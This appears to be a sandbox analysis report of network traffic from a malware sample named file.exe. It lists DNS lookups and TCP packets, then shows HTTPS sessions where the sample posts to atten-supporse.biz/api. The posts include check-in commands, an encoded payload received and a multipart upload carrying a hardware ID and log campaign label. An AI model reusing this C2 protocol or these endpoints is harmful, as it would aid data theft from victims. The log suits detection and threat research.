Dec 9, 2024 23:25:20.850653887 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:20.896821976 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:20.896853924 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:20.897186995 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:20.931900978 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:20.932032108 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:20.932038069 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:21.579602003 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:21.579699039 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:21.579737902 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:21.579806089 CET	49719	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:21.579821110 CET	443	49719	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:22.142685890 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:22.142751932 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:22.142874002 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:22.143157959 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:22.143170118 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.396691084 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.396773100 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.398082018 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.398103952 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.398359060 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.417519093 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.418555021 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.418591976 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.418721914 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.418751955 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.418900013 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.418921947 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.419235945 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.419274092 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.419666052 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.419713020 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.419905901 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.419934988 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.419945002 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.419955015 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.420141935 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.420173883 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.420201063 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.420423985 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.420445919 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.463340044 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.463563919 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.463624954 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.463664055 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.463682890 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:23.463752985 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:23.463776112 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:27.187484980 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:27.187568903 CET	443	49727	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:27.187762976 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:27.187782049 CET	49727	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:27.243273020 CET	49744	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:27.243324995 CET	443	49744	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:27.243428946 CET	49744	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:27.243838072 CET	49744	443	192.168.2.6	104.21.112.1
Dec 9, 2024 23:25:27.243849993 CET	443	49744	104.21.112.1	192.168.2.6
Dec 9, 2024 23:25:27.664935112 CET	49744	443	192.168.2.6	104.21.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 23:25:07.769237995 CET	55011	53	192.168.2.6	1.1.1.1
Dec 9, 2024 23:25:07.987737894 CET	53	55011	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 23:25:07.769237995 CET	192.168.2.6	1.1.1.1	0xcd04	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 23:25:07.987737894 CET	1.1.1.1	192.168.2.6	0xcd04	No error (0)	atten-supporse.biz	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 23:25:07.987737894 CET	1.1.1.1	192.168.2.6	0xcd04	No error (0)	atten-supporse.biz	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 23:25:07.987737894 CET	1.1.1.1	192.168.2.6	0xcd04	No error (0)	atten-supporse.biz	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 23:25:07.987737894 CET	1.1.1.1	192.168.2.6	0xcd04	No error (0)	atten-supporse.biz	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 23:25:07.987737894 CET	1.1.1.1	192.168.2.6	0xcd04	No error (0)	atten-supporse.biz	104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 23:25:07.987737894 CET	1.1.1.1	192.168.2.6	0xcd04	No error (0)	atten-supporse.biz	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 9, 2024 23:25:07.987737894 CET	1.1.1.1	192.168.2.6	0xcd04	No error (0)	atten-supporse.biz	104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

atten-supporse.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	104.21.112.1	443	5632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 22:25:09 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 22:25:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 22:25:09 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 22:25:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2qes12gco3thmsikbemqcead05; expires=Fri, 04-Apr-2025 16:11:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFvAmFd5BO1GI8Pl8yFvrzFB7xERJ5DOvkUuLqzEPuTzj7CuUiODAqiWv6PeDdvyDydaRRBhrFQRq26Hf%2FwNZ%2Bzu4dvUnRl96hTOOU1RIsxukzVsHaCtMaL%2FyV9LbPw6XbBvheU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef868d26f6ede98-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7362&min_rtt=1499&rtt_var=4181&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1947965&cwnd=208&unsent_bytes=0&cid=7c3a0c951fa59cee&ts=733&x=0"
2024-12-09 22:25:09 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 22:25:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49709	104.21.112.1	443	5632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 22:25:11 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-09 22:25:11 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-09 22:25:12 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 22:25:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ajgp4985dpatrc4f16ldubajrc; expires=Fri, 04-Apr-2025 16:11:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=naEkbKwHXya9pYRffs6Th8swkpE%2FtjTW3PSrNw5zIaYiGoKuZVIO9BlmIEtj1igWcEd7m4tlUkoEgYj0OCxHiQZAA%2Blsr1HNdomQaE9Qr52ha1iAN32OvuEeFmCESaA%2F4Ia9UWs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef868e0ce7dde98-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1520&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1903520&cwnd=208&unsent_bytes=0&cid=34405b8291cc0807&ts=727&x=0"
2024-12-09 22:25:12 UTC	354	IN	Data Raw: 34 39 31 63 0d 0a 30 65 67 46 59 43 4d 72 2f 2b 56 65 65 4e 48 73 70 7a 73 4f 6c 6e 4b 32 63 42 44 4e 42 41 47 45 43 4d 4d 4b 4b 31 6d 71 35 4c 71 71 79 6e 4e 43 47 52 2f 54 78 79 30 64 38 39 62 54 53 58 76 7a 58 70 51 52 64 4f 38 2b 5a 2b 56 6b 73 47 38 48 65 39 79 4a 6d 4f 75 4f 5a 41 78 51 54 74 50 48 4f 77 44 7a 31 76 78 41 4c 50 4d 63 6c 45 6f 79 71 47 35 6a 35 57 53 68 61 30 41 32 32 6f 6a 5a 75 59 52 69 43 45 5a 49 6d 34 51 79 46 62 53 4a 77 6c 70 6b 2b 42 76 62 47 48 33 76 4b 43 50 68 63 75 45 77 43 52 54 50 6b 4e 75 63 69 58 59 4c 41 56 62 54 6e 6e 77 64 76 38 36 64 47 57 2f 7a 45 4e 6f 57 64 4b 5a 73 61 65 78 73 6f 47 35 42 4b 63 4f 43 30 72 6d 4b 59 51 6c 4d 51 59 2b 4a 4f 42 4b 2f 6a 38 68 61 4c 4c 70 51 30 77 6f 79 39 79 59 77 31 47 6d 77 65 Data Ascii: 491c0egFYCMr/+VeeNHspzsOlnK2cBDNBAGECMMKK1mq5LqqynNCGR/Txy0d89bTSXvzXpQRdO8+Z+VksG8He9yJmOuOZAxQTtPHOwDz1vxALPMclEoyqG5j5WSha0A22ojZuYRiCEZIm4QyFbSJwlpk+BvbGH3vKCPhcuEwCRTPkNuciXYLAVbTnnwdv86dGW/zENoWdKZsaexsoG5BKcOC0rmKYQlMQY+JOBK/j8haLLpQ0woy9yYw1Gmwe
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 52 4a 32 56 4e 42 47 34 69 39 64 53 5a 66 6b 64 31 42 39 34 6f 47 56 6a 34 57 43 72 5a 30 4d 2f 78 59 76 65 73 34 6f 6e 54 41 46 4f 68 63 64 6b 57 70 43 4c 31 56 35 67 34 6c 4c 75 55 6d 33 68 66 79 50 68 5a 75 45 77 43 54 50 4e 68 64 75 34 68 57 51 4b 53 6c 75 64 6c 54 6f 58 74 70 7a 44 58 47 4c 2b 45 38 59 59 66 4b 6c 6c 61 75 31 6a 70 47 39 4e 65 34 62 47 33 36 76 4b 50 30 4a 67 52 4a 61 4c 4e 67 32 7a 7a 74 6f 58 64 62 51 58 32 46 49 71 37 32 4a 69 34 6d 75 6c 5a 6b 63 2f 78 49 44 57 76 6f 56 68 43 45 46 4f 6c 34 38 30 47 37 36 46 79 6c 6c 70 2b 52 54 53 48 6e 4f 71 4a 69 32 6d 62 62 6b 6f 45 58 76 6d 67 64 75 68 79 46 49 42 54 30 65 61 6b 58 77 46 2f 5a 65 46 58 6d 43 30 53 4a 51 63 64 36 42 30 59 76 52 76 72 33 70 46 50 73 36 4c 32 37 32 4b 59 67 56 Data Ascii: RJ2VNBG4i9dSZfkd1B94oGVj4WCrZ0M/xYves4onTAFOhcdkWpCL1V5g4lLuUm3hfyPhZuEwCTPNhdu4hWQKSludlToXtpzDXGL+E8YYfKllau1jpG9Ne4bG36vKP0JgRJaLNg2zztoXdbQX2FIq72Ji4mulZkc/xIDWvoVhCEFOl480G76Fyllp+RTSHnOqJi2mbbkoEXvmgduhyFIBT0eakXwF/ZeFXmC0SJQcd6B0YvRvr3pFPs6L272KYgV
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 58 77 46 2f 5a 65 46 58 6d 43 30 53 4a 51 66 65 71 70 6a 62 4f 64 67 72 32 31 44 4e 38 43 49 32 36 47 46 59 77 4a 4e 51 5a 65 4b 4d 68 36 37 68 38 35 53 61 76 51 52 33 6c 49 38 37 32 46 37 70 6a 4c 68 58 45 34 33 78 59 6d 61 68 6f 6c 70 44 45 5a 66 33 5a 68 79 41 2f 4f 4a 79 52 6b 30 74 42 7a 64 45 6e 6d 6c 59 6d 50 68 5a 36 52 72 54 6a 6a 46 67 64 4b 39 6a 57 4d 4f 53 45 53 62 68 7a 73 65 74 70 7a 41 55 47 44 34 55 4a 70 53 64 62 63 6d 4f 36 5a 46 70 6e 35 4b 46 4d 75 58 30 66 4f 56 4b 52 73 42 54 70 48 48 5a 46 71 30 69 38 31 53 61 76 77 51 78 68 64 38 70 47 64 70 34 47 75 73 5a 45 38 37 79 59 62 65 76 34 70 67 42 56 4e 62 6d 49 45 75 45 50 50 41 68 56 35 30 74 45 69 55 4a 47 4b 34 64 33 57 6b 58 36 4a 6d 52 7a 7a 65 78 73 66 39 6b 79 63 46 54 51 6e 46 Data Ascii: XwF/ZeFXmC0SJQfeqpjbOdgr21DN8CI26GFYwJNQZeKMh67h85SavQR3lI872F7pjLhXE43xYmaholpDEZf3ZhyA/OJyRk0tBzdEnmlYmPhZ6RrTjjFgdK9jWMOSESbhzsetpzAUGD4UJpSdbcmO6ZFpn5KFMuX0fOVKRsBTpHHZFq0i81SavwQxhd8pGdp4GusZE87yYbev4pgBVNbmIEuEPPAhV50tEiUJGK4d3WkX6JmRzzexsf9kycFTQnF
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 36 46 79 6c 4a 2b 39 42 33 51 48 6e 61 6e 62 57 6d 6d 4a 4f 46 76 55 58 75 51 78 75 32 2b 68 57 63 42 56 77 6d 43 79 53 56 61 74 49 4b 46 41 53 7a 34 48 74 51 64 66 71 4e 74 61 2b 64 6d 72 32 39 4d 4d 73 43 4f 79 72 4b 4f 62 77 4e 50 52 70 79 44 4f 52 2b 33 69 63 46 66 59 37 52 65 6c 42 56 71 37 7a 34 6a 79 55 32 55 4b 6d 67 42 69 4a 6d 57 71 73 70 67 44 67 45 52 33 59 73 2f 46 72 75 42 77 31 42 67 2f 68 6e 66 48 6e 6d 72 61 6d 72 6a 62 4b 42 74 54 44 72 4d 69 74 4b 31 69 57 51 4e 54 6b 61 56 78 33 4a 61 74 4a 61 46 41 53 7a 52 42 39 38 63 64 4f 39 35 4c 66 38 71 70 6d 51 4a 59 34 69 4b 30 62 57 4d 59 67 35 41 54 35 57 43 4e 42 36 79 69 4d 4e 61 59 2f 41 56 31 52 31 32 6f 32 68 70 35 32 75 74 59 30 59 77 7a 63 61 57 38 34 31 2f 51 68 6b 4a 72 49 51 71 44 Data Ascii: 6FylJ+9B3QHnanbWmmJOFvUXuQxu2+hWcBVwmCySVatIKFASz4HtQdfqNta+dmr29MMsCOyrKObwNPRpyDOR+3icFfY7RelBVq7z4jyU2UKmgBiJmWqspgDgER3Ys/FruBw1Bg/hnfHnmramrjbKBtTDrMitK1iWQNTkaVx3JatJaFASzRB98cdO95Lf8qpmQJY4iK0bWMYg5AT5WCNB6yiMNaY/AV1R12o2hp52utY0YwzcaW841/QhkJrIQqD
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 56 4c 4c 70 51 30 77 6f 79 39 79 5a 4e 37 58 6d 32 61 30 63 77 33 70 32 59 72 4d 52 2b 51 6b 5a 46 33 64 39 38 47 62 69 46 77 56 6c 67 39 42 54 5a 45 6d 43 67 59 57 54 76 59 62 4e 69 54 6a 7a 44 6a 74 4f 38 6a 48 55 4f 54 31 75 59 6c 53 35 61 2f 63 37 43 51 53 79 73 55 4f 49 56 59 72 39 6c 49 64 64 38 6f 6e 35 43 4e 73 54 47 78 2f 32 54 4a 77 56 4e 43 63 58 48 4f 68 57 36 6a 63 70 59 5a 66 67 64 30 52 74 33 72 6d 42 6e 37 47 43 68 62 6b 38 36 7a 59 7a 62 73 6f 42 75 42 55 6c 4f 6e 70 56 38 56 50 4f 4a 33 52 6b 30 74 44 6e 54 41 48 79 2f 4a 6e 79 6f 63 2b 46 76 52 58 75 51 78 74 79 35 68 57 4d 46 54 55 2b 59 67 54 45 62 76 49 2f 46 56 6d 6a 2f 47 64 49 54 66 36 70 72 5a 2f 52 67 71 6d 64 46 4d 73 53 4c 6d 50 33 4b 59 42 6f 42 45 64 32 32 4d 52 53 39 69 64 Data Ascii: VLLpQ0woy9yZN7Xm2a0cw3p2YrMR+QkZF3d98GbiFwVlg9BTZEmCgYWTvYbNiTjzDjtO8jHUOT1uYlS5a/c7CQSysUOIVYr9lIdd8on5CNsTGx/2TJwVNCcXHOhW6jcpYZfgd0Rt3rmBn7GChbk86zYzbsoBuBUlOnpV8VPOJ3Rk0tDnTAHy/Jnyoc+FvRXuQxty5hWMFTU+YgTEbvI/FVmj/GdITf6prZ/RgqmdFMsSLmP3KYBoBEd22MRS9id
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 46 64 6b 66 66 36 78 67 5a 65 31 6d 73 32 46 4a 4f 4d 50 47 6c 76 4f 4e 66 30 49 5a 43 62 36 51 4b 68 43 30 67 74 4e 53 62 66 63 47 32 51 49 79 34 53 5a 79 34 58 76 68 4d 46 38 72 33 34 48 48 2f 5a 4d 6e 42 55 30 4a 78 63 63 36 45 37 57 4a 77 31 64 2b 38 52 62 62 48 58 75 6d 59 6d 76 6c 61 71 56 73 54 6a 37 4c 69 74 4f 30 69 57 67 47 53 45 65 55 69 48 78 55 38 34 6e 64 47 54 53 30 4d 63 38 52 66 71 49 6d 66 4b 68 7a 34 57 39 46 65 35 44 47 31 4c 32 50 5a 77 68 48 54 5a 69 42 4e 68 2b 7a 68 63 5a 57 61 50 49 55 32 78 4a 35 70 6d 64 6c 34 32 43 71 62 6b 51 34 7a 6f 43 59 2f 63 70 67 47 67 45 52 33 61 63 6e 46 37 2b 4a 68 55 59 69 37 56 44 54 48 6a 4c 33 4a 6d 6a 71 62 71 5a 6f 52 44 6a 41 67 39 79 35 6a 32 63 4b 55 30 47 64 67 43 34 49 73 34 66 41 56 57 2f Data Ascii: Fdkff6xgZe1ms2FJOMPGlvONf0IZCb6QKhC0gtNSbfcG2QIy4SZy4XvhMF8r34HH/ZMnBU0Jxcc6E7WJw1d+8RbbHXumYmvlaqVsTj7LitO0iWgGSEeUiHxU84ndGTS0Mc8RfqImfKhz4W9Fe5DG1L2PZwhHTZiBNh+zhcZWaPIU2xJ5pmdl42CqbkQ4zoCY/cpgGgER3acnF7+JhUYi7VDTHjL3JmjqbqZoRDjAg9y5j2cKU0GdgC4Is4fAVW/
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 48 47 2f 5a 57 7a 33 56 4f 45 77 55 41 57 49 6a 63 36 30 6d 6d 51 55 53 6b 53 52 6c 67 4a 61 36 39 71 58 43 7a 36 6d 51 73 74 53 62 5a 41 6f 49 2b 63 71 2b 56 46 51 65 39 37 47 67 4f 48 45 4a 78 41 42 45 64 33 41 50 77 69 68 69 4d 5a 50 62 37 4d 75 36 6a 56 6b 70 57 46 7a 34 58 32 75 4b 41 64 37 78 38 61 41 69 73 70 75 42 56 70 59 69 34 6f 73 48 66 4f 78 69 78 6c 30 74 45 69 55 4a 33 47 68 61 47 54 77 65 2b 78 50 58 7a 48 50 6c 74 2b 6b 68 53 64 4d 41 55 2f 64 33 32 39 55 38 34 72 55 47 54 53 6b 51 6f 39 48 49 66 67 32 4d 66 6b 6b 75 43 68 66 65 35 44 55 6c 76 4f 59 4a 31 6f 42 44 70 36 56 4c 68 79 77 6d 4d 59 65 55 73 6f 33 7a 68 39 30 75 48 64 64 32 47 32 37 5a 55 38 73 32 63 72 4e 73 49 52 70 42 56 63 4a 30 38 63 7a 57 75 75 33 68 52 45 73 79 31 36 55 Data Ascii: HG/ZWz3VOEwUAWIjc60mmQUSkSRlgJa69qXCz6mQstSbZAoI+cq+VFQe97GgOHEJxABEd3APwihiMZPb7Mu6jVkpWFz4X2uKAd7x8aAispuBVpYi4osHfOxixl0tEiUJ3GhaGTwe+xPXzHPlt+khSdMAU/d329U84rUGTSkQo9HIfg2MfkkuChfe5DUlvOYJ1oBDp6VLhywmMYeUso3zh90uHdd2G27ZU8s2crNsIRpBVcJ08czWuu3hREsy16U
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 4d 77 73 54 72 7a 64 77 63 69 69 4a 43 59 36 39 67 70 51 6c 4d 4a 78 63 64 37 47 61 47 63 77 31 70 36 39 31 66 71 4c 46 57 68 59 57 4c 77 65 72 5a 6e 64 77 58 64 68 64 61 39 6a 58 45 54 41 51 66 64 69 48 78 43 69 73 36 4e 47 56 4f 36 55 4d 78 53 4b 75 39 54 59 4f 68 6b 70 6e 35 59 64 75 2b 49 33 37 4b 63 64 78 56 4f 43 64 50 48 4f 6c 72 72 33 49 73 5a 61 4f 56 51 6a 45 49 67 39 44 4d 77 73 54 72 7a 64 77 63 69 69 4a 43 59 36 39 67 70 51 6c 4d 4a 78 63 64 37 47 61 47 63 77 31 70 36 39 31 66 71 4c 46 57 68 59 57 4c 77 65 72 5a 6e 42 68 58 2b 70 2b 61 4e 6e 32 51 4d 54 30 36 4c 6c 6e 78 55 38 34 47 46 41 56 57 30 57 4a 51 74 50 4f 39 2b 49 37 34 71 6c 47 74 48 4e 63 2b 51 79 66 36 74 61 51 56 41 58 34 32 51 4d 31 57 64 75 4f 51 5a 49 72 51 57 6c 45 6f 67 34 Data Ascii: MwsTrzdwciiJCY69gpQlMJxcd7GaGcw1p691fqLFWhYWLwerZndwXdhda9jXETAQfdiHxCis6NGVO6UMxSKu9TYOhkpn5Ydu+I37KcdxVOCdPHOlrr3IsZaOVQjEIg9DMwsTrzdwciiJCY69gpQlMJxcd7GaGcw1p691fqLFWhYWLwerZnBhX+p+aNn2QMT06LlnxU84GFAVW0WJQtPO9+I74qlGtHNc+Qyf6taQVAX42QM1WduOQZIrQWlEog4
2024-12-09 22:25:12 UTC	1369	IN	Data Raw: 34 70 6e 68 4b 65 66 6d 51 32 37 4f 45 59 45 49 50 43 59 58 48 5a 46 71 65 6e 4d 4a 4a 62 37 52 65 6c 42 34 79 39 79 5a 75 39 47 32 78 61 77 55 38 30 6f 47 59 72 4d 52 2b 51 6c 63 4a 78 64 52 79 57 71 48 4f 6e 52 6b 72 2b 68 33 56 45 58 79 73 64 48 48 67 61 62 64 72 44 67 58 32 71 38 71 30 6d 6d 52 41 63 45 53 5a 6b 53 6b 5a 6f 34 6e 37 5a 30 48 6d 46 38 51 52 4d 49 4e 68 62 75 70 55 6e 31 39 59 50 4e 6a 45 2f 72 43 63 5a 45 49 50 43 59 58 48 5a 46 71 65 6e 4d 4a 4a 62 37 59 38 30 78 39 2b 37 33 6b 74 2f 79 71 33 4b 42 46 6f 68 73 62 4b 38 39 49 6e 52 55 4a 62 6a 34 45 2f 44 4c 44 4a 2b 32 64 42 35 68 66 45 45 54 43 65 61 32 66 77 66 36 4a 34 54 67 58 32 71 38 71 30 6d 6d 52 41 5a 48 50 66 74 69 6f 5a 73 34 44 43 47 53 4b 30 43 4a 52 4b 4d 6f 4a 30 5a 50 Data Ascii: 4pnhKefmQ27OEYEIPCYXHZFqenMJJb7RelB4y9yZu9G2xawU80oGYrMR+QlcJxdRyWqHOnRkr+h3VEXysdHHgabdrDgX2q8q0mmRAcESZkSkZo4n7Z0HmF8QRMINhbupUn19YPNjE/rCcZEIPCYXHZFqenMJJb7Y80x9+73kt/yq3KBFohsbK89InRUJbj4E/DLDJ+2dB5hfEETCea2fwf6J4TgX2q8q0mmRAZHPftioZs4DCGSK0CJRKMoJ0ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49710	104.21.112.1	443	5632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 22:25:13 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NVWURIH7D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12811 Host: atten-supporse.biz
2024-12-09 22:25:13 UTC	12811	OUT	Data Raw: 2d 2d 4e 56 57 55 52 49 48 37 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 31 42 38 46 41 33 42 43 31 34 43 35 44 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4e 56 57 55 52 49 48 37 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 56 57 55 52 49 48 37 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4e 56 57 55 52 49 48 37 44 0d 0a 43 6f 6e 74 65 6e Data Ascii: --NVWURIH7DContent-Disposition: form-data; name="hwid"5A1B8FA3BC14C5DD23D904AF30EFEBBC--NVWURIH7DContent-Disposition: form-data; name="pid"2--NVWURIH7DContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--NVWURIH7DConten
2024-12-09 22:25:14 UTC	1023	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 22:25:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bh04p0mib58jv4iii89outvqtj; expires=Fri, 04-Apr-2025 16:11:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5wY5fYQy9fzf4YQKLEehiHpevJeatUT7emnjDzzoz2%2BAlrqmUX3XVKQlrb9Zywlc0onee0mI7YbQz3i5vOD0CG5%2FDu6pwbL9iiK5csftmbM4ygVz%2F%2B126SAHthOIL%2FYY1dl7zZI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} 